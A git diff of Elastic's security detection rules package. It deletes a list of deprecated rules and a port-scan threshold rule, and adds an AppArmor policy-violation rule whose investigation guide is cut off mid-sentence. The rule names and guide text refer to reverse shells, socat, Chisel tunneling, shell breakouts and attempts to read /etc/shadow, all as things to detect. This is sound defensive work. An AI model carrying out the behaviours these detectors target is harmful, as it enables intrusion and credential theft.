diff --git a/packages/security_detection_engine/changelog.yml b/packages/security_detection_engine/changelog.yml index ca89e8a83db..11bb134cd6c 100644 --- a/packages/security_detection_engine/changelog.yml +++ b/packages/security_detection_engine/changelog.yml @@ -1,5 +1,10 @@ # newer versions go on top # NOTE: please use pre-release versions (e.g. -beta.0) until a package is ready for production +- version: 8.19.18-beta.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/17984 - version: 8.19.17 changes: - description: Release security rules update diff --git a/packages/security_detection_engine/deprecated_rules.json b/packages/security_detection_engine/deprecated_rules.json deleted file mode 100644 index 99fc1fc9451..00000000000 --- a/packages/security_detection_engine/deprecated_rules.json +++ /dev/null @@ -1,557 +0,0 @@ -{ - "015cca13-8832-49ac-a01b-a396114809f6": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS Redshift Cluster Creation", - "stack_version": "8.19" - }, - "03a514d9-500e-443e-b6a9-72718c548f6c": { - "deprecation_date": "2025/03/14", - "rule_name": "Deprecated - SSH Process Launched From Inside A Container", - "stack_version": "8.14" - }, - "041d4d41-9589-43e2-ba13-5680af75ebc2": { - "deprecation_date": "2023/09/25", - "rule_name": "Deprecated - Potential DNS Tunneling via Iodine", - "stack_version": "8.3" - }, - "08d5d7e2-740f-44d8-aeda-e41f4263efaf": { - "deprecation_date": "2021/04/15", - "rule_name": "TCP Port 8000 Activity to the Internet", - "stack_version": "7.14.0" - }, - "09443c92-46b3-45a4-8f25-383b028b258d": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Process Termination followed by Deletion", - "stack_version": "8.19" - }, - "0968cfbd-40f0-4b1c-b7b1-a60736c7b241": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via cpulimit Shell Evasion", - "stack_version": "7.16" - }, - "0c9a14d9-d65d-486f-9b5b-91e4e6b22bd0": { - "deprecation_date": "2023/07/03", - "rule_name": "Deprecated - Threat Intel Indicator Match", - "stack_version": "8.5" - }, - "0f616aee-8161-4120-857e-742366f5eeb3": { - "deprecation_date": "2021/04/15", - "rule_name": "PowerShell spawning Cmd", - "stack_version": "7.14.0" - }, - "10754992-28c7-4472-be5b-f3770fd04f2d": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via awk Commands", - "stack_version": "7.16" - }, - "119c8877-8613-416d-a98a-96b6664ee73a5": { - "deprecation_date": "2021/08/02", - "rule_name": "AWS RDS Snapshot Export", - "stack_version": "7.13" - }, - "120559c6-5e24-49f4-9e30-8ffe697df6b9": { - "deprecation_date": "2021/04/15", - "rule_name": "User Discovery via Whoami", - "stack_version": "7.14.0" - }, - "125417b8-d3df-479f-8418-12d7e034fee3": { - "deprecation_date": "2022/07/25", - "rule_name": "Attempt to Disable IPTables or Firewall", - "stack_version": "7.16" - }, - "139c7458-566a-410c-a5cd-f80238d6a5cd": { - "deprecation_date": "2021/04/15", - "rule_name": "SQL Traffic to the Internet", - "stack_version": "7.14.0" - }, - "1859ce38-6a50-422b-a5e8-636e231ea0cd": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via c89/c99 Shell evasion", - "stack_version": "7.16" - }, - "1ba5160d-f5a2-4624-b0ff-6a1dc55d2516": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS ElastiCache Security Group Modified or Deleted", - "stack_version": "8.19" - }, - "1c84dd64-7e6c-4bad-ac73-a5014ee37042": { - "deprecation_date": "2025/06/26", - "rule_name": "Deprecated - Suspicious File Creation in /etc for Persistence", - "stack_version": "8.18" - }, - "1defdd62-cd8d-426e-a246-81a37751bb2b": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Execution of File Written or Modified by PDF Reader", - "stack_version": "8.19" - }, - "20dc4620-3b68-4269-8124-ca5091e00ea8": { - "deprecation_date": "2022/07/25", - "rule_name": "Auditd Max Login Sessions", - "stack_version": "7.16" - }, - "231876e7-4d1f-4d63-a47c-47dd1acdc1cb": { - "deprecation_date": "2023/03/04", - "rule_name": "Potential Shell via Web Server", - "stack_version": "8.3" - }, - "2377946d-0f01-4957-8812-6878985f515d": { - "deprecation_date": "2024/04/01", - "rule_name": "Deprecated - Remote File Creation on a Sensitive Directory", - "stack_version": "8.9" - }, - "28738f9f-7427-4d23-bc69-756708b5f624": { - "deprecation_date": "2024/07/18", - "rule_name": "Suspicious File Changes Activity Detected", - "stack_version": "8.10" - }, - "28896382-7d4f-4d50-9b72-67091901fd26": { - "deprecation_date": "2022/08/03", - "rule_name": "Suspicious Process from Conhost", - "stack_version": "7.16" - }, - "2f0bae2d-bf20-4465-be86-1311addebaa3": { - "deprecation_date": "2022/10/04", - "rule_name": "GCP Kubernetes Rolebindings Created or Patched", - "stack_version": "8.3" - }, - "301571f3-b316-4969-8dd0-7917410030d3": { - "deprecation_date": "2023/12/14", - "rule_name": "Malicious Remote File Creation", - "stack_version": "8.9" - }, - "30e1e9f2-eb9c-439f-aff6-1e3068e99384": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Network Connection via Sudo Binary", - "stack_version": "8.19" - }, - "3115bd2c-0baa-4df0-80ea-45e474b5ef93": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Agent Spoofing - Mismatched Agent ID", - "stack_version": "8.19" - }, - "3605a013-6f0c-4f7d-88a5-326f5be262ec": { - "deprecation_date": "2022/08/01", - "rule_name": "Potential Privilege Escalation via Local Kerberos Relay over LDAP", - "stack_version": "7.16" - }, - "378f9024-8a0c-46a5-aa08-ce147ac73a4e": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS RDS Security Group Creation", - "stack_version": "8.19" - }, - "3a86e085-094c-412d-97ff-2439731e59cb": { - "deprecation_date": "2021/03/03", - "rule_name": "Setgid Bit Set via chmod", - "stack_version": "7.13" - }, - "3efee4f0-182a-40a8-a835-102c68a4175d": { - "deprecation_date": "2025/01/17", - "rule_name": "Deprecated - Potential Password Spraying of Microsoft 365 User Accounts", - "stack_version": "8.12" - }, - "43303fd4-4839-4e48-b2b2-803ab060758d": { - "deprecation_date": "2022/09/13", - "rule_name": "Web Application Suspicious Activity: No User Agent", - "stack_version": "8.5" - }, - "47f09343-8d1f-4bb5-8bb0-00c9d18f5010": { - "deprecation_date": "2021/03/17", - "rule_name": "Execution via Regsvcs/Regasm", - "stack_version": "7.14.0" - }, - "4973e46b-a663-41b8-a875-ced16dda2bb0": { - "deprecation_date": "2023/09/25", - "rule_name": "Deprecated - Potential Process Injection via LD_PRELOAD Environment Variable", - "stack_version": "8.6" - }, - "4aa58ac6-4dc0-4d18-b713-f58bf8bd015c": { - "deprecation_date": "2025/03/04", - "rule_name": "Potential Cross Site Scripting (XSS)", - "stack_version": "8.12" - }, - "4b1a807a-4e7b-414e-8cea-24bf580f6fc5": { - "deprecation_date": "2023/11/02", - "rule_name": "Deprecated - Potential Reverse Shell via Suspicious Parent Process", - "stack_version": "8.3" - }, - "521fbe5c-a78d-4b6b-a323-f978b0e4c4c0": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Potential Successful Linux RDP Brute Force Attack Detected", - "stack_version": "8.19" - }, - "573f6e7a-7acf-4bcd-ad42-c4969124d3c0": { - "deprecation_date": "2025/07/09", - "rule_name": "Deprecated - Azure Virtual Network Device Modified or Deleted", - "stack_version": "8.18" - }, - "5c50ffa6-07f4-4cce-a1b7-c16928a2ed52": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - SSH Process Launched From Inside A Container via Elastic Defend", - "stack_version": "8.19" - }, - "5e87f165-45c2-4b80-bfa5-52822552c997": { - "deprecation_date": "2022/03/16", - "rule_name": "Potential PrintNightmare File Modification", - "stack_version": "7.13" - }, - "61c31c14-507f-4627-8c31-072556b89a9c": { - "deprecation_date": "2021/04/15", - "rule_name": "Mknod Process Activity", - "stack_version": "7.14.0" - }, - "62b68eb2-1e47-4da7-85b6-8f478db5b272": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Potential Non-Standard Port HTTP/HTTPS connection", - "stack_version": "8.19" - }, - "6506c9fd-229e-4722-8f0f-69be759afd2a": { - "deprecation_date": "2022/03/16", - "rule_name": "Potential PrintNightmare Exploit Registry Modification", - "stack_version": "7.13" - }, - "66712812-e7f2-4a1d-bbda-dd0b5cf20c5d": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Potential Successful Linux FTP Brute Force Attack Detected", - "stack_version": "8.19" - }, - "67a9beba-830d-4035-bfe8-40b7e28f8ac4": { - "deprecation_date": "2021/04/15", - "rule_name": "SMTP to the Internet", - "stack_version": "7.14.0" - }, - "68113fdc-3105-4cdd-85bb-e643c416ef0b": { - "deprecation_date": "2021/04/15", - "rule_name": "Query Registry via reg.exe", - "stack_version": "7.14.0" - }, - "699e9fdb-b77c-4c01-995c-1c15019b9c43": { - "deprecation_date": "2023/07/03", - "rule_name": "Deprecated - Threat Intel Filebeat Module (v8.x) Indicator Match", - "stack_version": "8.5" - }, - "6ea71ff0-9e95-475b-9506-2580d1ce6154": { - "deprecation_date": "2022/08/02", - "rule_name": "DNS Activity to the Internet", - "stack_version": "7.16" - }, - "6f1500bc-62d7-4eb9-8601-7485e87da2f4": { - "deprecation_date": "2021/04/15", - "rule_name": "SSH (Secure Shell) to the Internet", - "stack_version": "7.14.0" - }, - "6f683345-bb10-47a7-86a7-71e9c24fb358": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via the find command", - "stack_version": "7.16" - }, - "72d33577-f155-457d-aad3-379f9b750c97": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via env Shell Evasion", - "stack_version": "7.16" - }, - "7a137d76-ce3d-48e2-947d-2747796a78c0": { - "deprecation_date": "2021/04/15", - "rule_name": "Network Sniffing via Tcpdump", - "stack_version": "7.14.0" - }, - "7b08314d-47a0-4b71-ae4e-16544176924f": { - "deprecation_date": "2022/08/02", - "rule_name": "File and Directory Discovery", - "stack_version": "7.16" - }, - "7b3da11a-60a2-412e-8aa7-011e1eb9ed47": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS ElastiCache Security Group Created", - "stack_version": "8.19" - }, - "7d2c38d7-ede7-4bdf-b140-445906e6c540": { - "deprecation_date": "2021/04/15", - "rule_name": "Tor Activity to the Internet", - "stack_version": "7.14.0" - }, - "81cc58f5-8062-49a2-ba84-5cc4b4d31c40": { - "deprecation_date": "2021/04/15", - "rule_name": "Persistence via Kernel Module Modification", - "stack_version": "7.14.0" - }, - "83b2c6e5-e0b2-42d7-8542-8f3af86a1acb": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via the mysql command", - "stack_version": "7.16" - }, - "863cdf31-7fd3-41cf-a185-681237ea277b": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS RDS Security Group Deletion", - "stack_version": "8.19" - }, - "86c3157c-a951-4a4f-989b-2f0d0f1f9518": { - "deprecation_date": "2024/02/22", - "rule_name": "Potential Linux Reverse Connection through Port Knocking", - "stack_version": "8.3" - }, - "87ec6396-9ac4-4706-bcf0-2ebb22002f43": { - "deprecation_date": "2021/04/15", - "rule_name": "FTP (File Transfer Protocol) Activity to the Internet", - "stack_version": "7.14.0" - }, - "89583d1b-3c2e-4606-8b74-0a9fd2248e88": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via the vi command", - "stack_version": "7.16" - }, - "8acb7614-1d92-4359-bfcf-478b6d9de150": { - "deprecation_date": "2025/01/17", - "rule_name": "Deprecated - Suspicious JAVA Child Process", - "stack_version": "8.12" - }, - "8fed8450-847e-43bd-874c-3bbf0cd425f3": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via apt/apt-get Changelog Escape", - "stack_version": "7.16" - }, - "90e28af7-1d96-4582-bf11-9a1eff21d0e5": { - "deprecation_date": "2022/07/25", - "rule_name": "Auditd Login Attempt at Forbidden Time", - "stack_version": "7.16" - }, - "93f47b6f-5728-4004-ba00-625083b3dcb0": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Modification of Standard Authentication Module or Configuration", - "stack_version": "8.19" - }, - "947827c6-9ed6-4dec-903e-c856c86e72f3": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Creation of Kernel Module", - "stack_version": "8.19" - }, - "97da359b-2b61-4a40-b2e4-8fc48cf7a294": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via the SSH command", - "stack_version": "7.16" - }, - "97f22dab-84e8-409d-955e-dacd1d31670b": { - "deprecation_date": "2021/04/15", - "rule_name": "Base64 Encoding/Decoding Activity", - "stack_version": "7.14.0" - }, - "98fd7407-0bd5-5817-cda0-3fcc33113a56": { - "deprecation_date": "2025/07/16", - "rule_name": "Deprecated - AWS EC2 Snapshot Activity", - "stack_version": "8.18" - }, - "9cf7a0ae-2404-11ed-ae7d-f661ea17fbce": { - "deprecation_date": "2023/02/16", - "rule_name": "Google Workspace User Group Access Modified to Allow External Access", - "stack_version": "8.4" - }, - "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae1": { - "deprecation_date": "2021/04/15", - "rule_name": "Trusted Developer Application Usage", - "stack_version": "7.14.0" - }, - "9d19ece6-c20e-481a-90c5-ccca596537de": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - LaunchDaemon Creation or Modification and Immediate Loading", - "stack_version": "8.19" - }, - "a4ec1382-4557-452b-89ba-e413b22ed4b8": { - "deprecation_date": "2020/10/30", - "rule_name": "Network Connection via Mshta", - "stack_version": "7.10.0" - }, - "a577e524-c2ee-47bd-9c5b-e917d01d3276": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - CAP_SYS_ADMIN Assigned to Binary", - "stack_version": "8.19" - }, - "a5f0d057-d540-44f5-924d-c6a2ae92f045": { - "deprecation_date": "2023/06/22", - "rule_name": "Potential SSH Brute Force Detected on Privileged Account", - "stack_version": "8.3" - }, - "a9198571-b135-4a76-b055-e3e5a476fd83": { - "deprecation_date": "2021/04/15", - "rule_name": "Hex Encoding/Decoding Activity", - "stack_version": "7.14.0" - }, - "ac8805f6-1e08-406c-962e-3937057fa86f": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Potential Protocol Tunneling via Chisel Server", - "stack_version": "8.19" - }, - "ad0e5e75-dd89-4875-8d0a-dfdc1828b5f3": { - "deprecation_date": "2021/04/15", - "rule_name": "Proxy Port Activity to the Internet", - "stack_version": "7.14.0" - }, - "b1c14366-f4f8-49a0-bcbb-51d2de8b0bb8": { - "deprecation_date": "2021/04/15", - "rule_name": "Potential Persistence via Cron Job", - "stack_version": "7.14.0" - }, - "bc0c6f0d-dab0-47a3-b135-0925f0a333bc": { - "deprecation_date": "2025/11/21", - "rule_name": "Deprecated - AWS Root Login Without MFA", - "stack_version": "8.19" - }, - "bc8ca7e0-92fd-4b7c-b11e-ee0266b8d9c9": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Potential Non-Standard Port SSH connection", - "stack_version": "8.19" - }, - "bdb04043-f0e3-4efa-bdee-7d9d13fa9edc": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Potential Pspy Process Monitoring Detected", - "stack_version": "8.19" - }, - "c125e48f-6783-41f0-b100-c3bf1b114d16": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Suspicious Renaming of ESXI index.html File", - "stack_version": "8.19" - }, - "c6474c34-4953-447a-903e-9fcb7b6661aa": { - "deprecation_date": "2021/04/15", - "rule_name": "IRC (Internet Relay Chat) Protocol Activity to the Internet", - "stack_version": "7.14.0" - }, - "c6655282-6c79-11ef-bbb5-f661ea17fbcc": { - "deprecation_date": "2025/07/16", - "rule_name": "Deprecated - Azure Entra Sign-in Brute Force Microsoft 365 Accounts by Repeat Source", - "stack_version": "8.18" - }, - "c87fca17-b3a9-4e83-b545-f30746c53920": { - "deprecation_date": "2021/04/15", - "rule_name": "Nmap Process Activity", - "stack_version": "7.14.0" - }, - "cab4f01c-793f-4a54-a03e-e5d85b96d7af": { - "deprecation_date": "2022/07/25", - "rule_name": "Auditd Login from Forbidden Location", - "stack_version": "7.16" - }, - "cc16f774-59f9-462d-8b98-d27ccd4519ec": { - "deprecation_date": "2021/04/15", - "rule_name": "Process Discovery via Tasklist", - "stack_version": "7.14.0" - }, - "ccc55af4-9882-4c67-87b4-449a7ae8079c": { - "deprecation_date": "2023/12/15", - "rule_name": "Potential Process Herpaderping Attempt", - "stack_version": "8.3" - }, - "cd4d5754-07e1-41d4-b9a5-ef4ea6a0a126": { - "deprecation_date": "2021/04/15", - "rule_name": "Socat Process Activity", - "stack_version": "7.14.0" - }, - "d2053495-8fe7-4168-b3df-dad844046be3": { - "deprecation_date": "2021/04/15", - "rule_name": "PPTP (Point to Point Tunneling Protocol) Activity", - "stack_version": "7.14.0" - }, - "d55436a8-719c-445f-92c4-c113ff2f9ba5": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Potential Privilege Escalation via UID INT_MAX Bug Detected", - "stack_version": "8.19" - }, - "d6450d4e-81c6-46a3-bd94-079886318ed5": { - "deprecation_date": "2022/07/28", - "rule_name": "Strace Process Activity", - "stack_version": "7.16" - }, - "da986d2c-ffbf-4fd6-af96-a88dbf68f386": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via the gcc command", - "stack_version": "7.16" - }, - "dc672cb7-d5df-4d1f-a6d7-0841b1caafb9": { - "deprecation_date": "2022/01/12", - "rule_name": "Threat Intel Filebeat Module (v7.x) Indicator Match", - "stack_version": "8.0" - }, - "dd7f1524-643e-11ed-9e35-f661ea17fbcd": { - "deprecation_date": "2023/07/04", - "rule_name": "Reverse Shell Created via Named Pipe", - "stack_version": "8.3" - }, - "df959768-b0c9-4d45-988c-5606a2be8e5a": { - "deprecation_date": "2022/07/25", - "rule_name": "Unusual Process Execution - Temp", - "stack_version": "7.16" - }, - "e0dacebe-4311-4d50-9387-b17e89c2e7fd": { - "deprecation_date": "2022/08/02", - "rule_name": "Whitespace Padding in Process Command Line", - "stack_version": "7.16" - }, - "e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS RDS Cluster Creation", - "stack_version": "8.19" - }, - "e56993d2-759c-4120-984c-9ec9bb940fd5": { - "deprecation_date": "2021/04/15", - "rule_name": "RDP (Remote Desktop Protocol) to the Internet", - "stack_version": "7.14.0" - }, - "e919611d-6b6f-493b-8314-7ed6ac2e413b": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS EC2 VM Export Failure", - "stack_version": "8.19" - }, - "e9b4a3c7-24fc-49fd-a00f-9c938031eef1": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via busybox Shell Evasion", - "stack_version": "7.16" - }, - "ea0784f0-a4d7-4fea-ae86-4baaf27a6f17": { - "deprecation_date": "2021/04/15", - "rule_name": "SSH (Secure Shell) from the Internet", - "stack_version": "7.14.0" - }, - "eb6a3790-d52d-11ec-8ce9-f661ea17fbce": { - "deprecation_date": "2023/07/31", - "rule_name": "Suspicious Network Connection Attempt by Root", - "stack_version": "8.3" - }, - "ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS RDS Instance/Cluster Stoppage", - "stack_version": "8.19" - }, - "ee619805-54d7-4c56-ba6f-7717282ddd73": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via crash Shell evasion", - "stack_version": "7.16" - }, - "f30f3443-4fbb-4c27-ab89-c3ad49d62315": { - "deprecation_date": "2026/01/16", - "rule_name": "Deprecated - AWS RDS Instance Creation", - "stack_version": "8.19" - }, - "f41296b4-9975-44d6-9486-514c6f635b2d": { - "deprecation_date": "2026/02/04", - "rule_name": "Deprecated - Potential curl CVE-2023-38545 Exploitation", - "stack_version": "8.19" - }, - "f52362cd-baf1-4b6d-84be-064efc826461": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via flock Shell evasion", - "stack_version": "7.16" - }, - "f5488ac1-099e-4008-a6cb-fb638a0f0828": { - "deprecation_date": "2025/03/14", - "rule_name": "Deprecated - SSH Connection Established Inside A Running Container", - "stack_version": "8.14" - }, - "fb9937ce-7e21-46bf-831d-1ad96eac674d": { - "deprecation_date": "2022/07/25", - "rule_name": "Auditd Max Failed Login Attempts", - "stack_version": "7.16" - }, - "fd3fc25e-7c7c-4613-8209-97942ac609f6": { - "deprecation_date": "2022/05/09", - "rule_name": "Linux Restricted Shell Breakout via the expect command", - "stack_version": "7.16" - } -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_12.json b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_12.json deleted file mode 100644 index e35ec0c0445..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_12.json +++ /dev/null @@ -1,116 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule identifies a potential port scan. A port scan is a method utilized by attackers to systematically scan a target system or network for open ports, allowing them to identify available services and potential vulnerabilities. By mapping out the open ports, attackers can gather critical information to plan and execute targeted attacks, gaining unauthorized access, compromising security, and potentially leading to data breaches, unauthorized control, or further exploitation of the targeted system or network. This rule defines a threshold-based approach to detect connection attempts from a single source to a wide range of destination ports.", - "from": "now-9m", - "index": [ - "logs-network_traffic.*", - "packetbeat-*", - "filebeat-*", - "logs-panw.panos*" - ], - "language": "kuery", - "license": "Elastic License v2", - "max_signals": 5, - "name": "Potential Network Scan Detected", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Network Scan Detected\n\nNetwork scanning is a technique used to identify open ports and services on a network, often exploited by attackers to find vulnerabilities. Adversaries may use this method to map out a network's structure and identify weak points for further exploitation. The detection rule identifies suspicious activity by monitoring for multiple connection attempts from a single source to numerous destination ports, indicating a potential scan. This helps in early detection and mitigation of reconnaissance activities.\n\n### Possible investigation steps\n\n- Review the source IP address involved in the alert to determine if it belongs to a known or trusted entity within the organization. Check if the IP falls within the specified ranges: 10.0.0.0/8, 172.16.0.0/12, or 192.168.0.0/16.\n- Analyze the network flow logs to identify the specific destination ports that were targeted by the source IP. Determine if these ports are associated with critical services or known vulnerabilities.\n- Correlate the detected activity with any recent changes or updates in the network infrastructure that might explain the scanning behavior, such as new devices or services being deployed.\n- Investigate if there are any other alerts or logs indicating similar scanning activities from the same source IP or other IPs within the same subnet, which might suggest a coordinated scanning effort.\n- Check for any historical data or past incidents involving the source IP to assess if this behavior is part of a recurring pattern or a new anomaly.\n- Consult with network administrators to verify if the detected activity aligns with any scheduled network assessments or security tests that might have been conducted without prior notification.\n\n### False positive analysis\n\n- Internal network scanning tools used for legitimate security assessments can trigger this rule. To manage this, create exceptions for known IP addresses of authorized scanning tools.\n- Automated network monitoring systems that check service availability across multiple ports may be flagged. Exclude these systems by identifying their IP addresses and adding them to an exception list.\n- Load balancers and network devices that perform health checks on various services might cause false positives. Identify these devices and configure the rule to ignore their IP addresses.\n- Development and testing environments where frequent port scanning is part of routine operations can be mistakenly flagged. Implement exceptions for these environments by specifying their IP ranges.\n- Regularly scheduled vulnerability assessments conducted by internal security teams can appear as network scans. Document these activities and exclude the associated IPs from triggering the rule.\n\n### Response and remediation\n\n- Isolate the affected host: Immediately disconnect the source IP from the network to prevent further scanning or potential exploitation of identified vulnerabilities.\n- Conduct a thorough investigation: Analyze the source IP's activity logs to determine if any unauthorized access or data exfiltration has occurred. This will help assess the extent of the threat.\n- Update firewall rules: Implement stricter access controls to limit the number of open ports and restrict unnecessary inbound and outbound traffic from the affected IP range.\n- Patch and update systems: Ensure all systems and services identified during the scan are up-to-date with the latest security patches to mitigate known vulnerabilities.\n- Monitor for recurrence: Set up enhanced monitoring for the source IP and similar scanning patterns to quickly detect and respond to any future scanning attempts.\n- Escalate to security operations: If the scan is part of a larger attack or if sensitive data is at risk, escalate the incident to the security operations team for further analysis and response.\n- Review and enhance detection capabilities: Evaluate the effectiveness of current detection mechanisms and consider integrating additional threat intelligence sources to improve early detection of similar threats.", - "query": "event.action:network_flow and destination.port:* and source.ip:(10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)\n", - "related_integrations": [ - { - "package": "network_traffic", - "version": "^1.1.0" - }, - { - "package": "panw", - "version": "^5.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "destination.port", - "type": "long" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - } - ], - "risk_score": 21, - "rule_id": "0171f283-ade7-4f87-9521-ac346c68cc9b", - "severity": "low", - "tags": [ - "Domain: Network", - "Tactic: Discovery", - "Tactic: Reconnaissance", - "Use Case: Network Security Monitoring", - "Data Source: PAN-OS", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1046", - "name": "Network Service Discovery", - "reference": "https://attack.mitre.org/techniques/T1046/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0043", - "name": "Reconnaissance", - "reference": "https://attack.mitre.org/tactics/TA0043/" - }, - "technique": [ - { - "id": "T1595", - "name": "Active Scanning", - "reference": "https://attack.mitre.org/techniques/T1595/", - "subtechnique": [ - { - "id": "T1595.001", - "name": "Scanning IP Blocks", - "reference": "https://attack.mitre.org/techniques/T1595/001/" - } - ] - } - ] - } - ], - "threshold": { - "cardinality": [ - { - "field": "destination.port", - "value": 250 - } - ], - "field": [ - "destination.ip", - "source.ip" - ], - "value": 1 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 12 - }, - "id": "0171f283-ade7-4f87-9521-ac346c68cc9b_12", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/02137bc2-5cc2-4f7f-a8e4-c52dc239aa69_1.json b/packages/security_detection_engine/kibana/security_rule/02137bc2-5cc2-4f7f-a8e4-c52dc239aa69_1.json new file mode 100644 index 00000000000..87ed39182b8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/02137bc2-5cc2-4f7f-a8e4-c52dc239aa69_1.json @@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies events where the AppArmor security module blocked or restricted an operation due to a policy violation. AppArmor enforces mandatory access control policies that limit how processes interact with system resources such as files, network sockets, and capabilities. When a process attempts an action that is not permitted by the active profile, the kernel generates a policy violation event. While these events can occur during normal operation or misconfiguration, they may also indicate attempted privilege escalation, restricted file access, or malicious activity being prevented by the system's security policy.", + "from": "now-9m", + "index": [ + "logs-auditd_manager.auditd-*", + "auditbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "AppArmor Policy Violation Detected", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AppArmor Policy Violation Detected\n\nThis alert shows that AppArmor blocked or limited a Linux process because it tried to act outside its assigned security profile, which can reveal privilege escalation, restricted file access, or defense-evasion activity being stopped by the kernel. An attacker who gains code execution in a web-facing service might try to read `/etc/shadow`, spawn a shell from the confined process, or touch protected sockets, causing this violation when AppArmor contains the behavior.\n\n### Possible investigation steps\n\n- Determine which AppArmor profile produced the denial and what resource or capability was blocked, then judge whether the attempted action matches the application's expected behavior or suggests shell execution, credential access, or unusual network activity.\n- Build a short timeline around the event for the affected workload to identify preceding parent-child process chains, interactive sessions, failed access attempts, new persistence artifacts, or outbound connections that indicate exploitation rather than misconfiguration.\n- Review recent software deployments, package updates, profile changes, and administrator actions on the host to verify whether the violation began after a legitimate change that may require profile tuning or rollback.\n- If the denied behavior is unexpected or repeated, validate the integrity and reputation of the involved binary or script against known-good versions from the environment and inspect its execution context for signs of tampering or abuse.\n- For violations that align with malicious behavior, preserve relevant audit and system logs, contain the host or impacted service as needed, remove any confirmed malicious artifacts, and retain or harden the AppArmor policy that successfully blocked the action.\n\n### False positive analysis\n\n- A legitimate application or package update may change binaries, file paths, or socket usage without a matching AppArmor profile update, so verify the alert timing against recent host software changes and confirm the denied path or capability is part of the application's documented normal operation.\n- An administrator-initiated maintenance task or service restart can trigger a confined process to access temporary files, logs, or helper executables outside its usual profile, so review the parent process, command line, and user context to confirm it aligns with expected maintenance activity on the host.\n\n### Response and remediation\n\n- Isolate the affected Linux host or container from the network, stop the compromised service or process that triggered the AppArmor denial, and disable any abused user or service account to prevent additional attacker execution.\n- Remove attacker footholds by deleting unauthorized systemd units, cron jobs, startup scripts, SSH `authorized_keys` additions, dropped web shells, or replaced binaries linked to the confined process, then terminate any related child shells or reverse-connection tools.\n- Restore the workload to a known-good state by rebuilding the host or redeploying the service from a trusted image, reinstalling affected packages, validating critical files such as `/etc/passwd`, `/etc/shadow`, and application binaries against baseline hashes, and rotating any credentials the process may have reached.\n- Escalate to incident response immediately if the denial came from an internet-facing service, involved attempts to spawn a shell or read protected files, showed tampering with `/etc/apparmor.d/`, or appeared on multiple hosts, because these are strong indicators of active exploitation or wider compromise.\n- Harden the environment by keeping 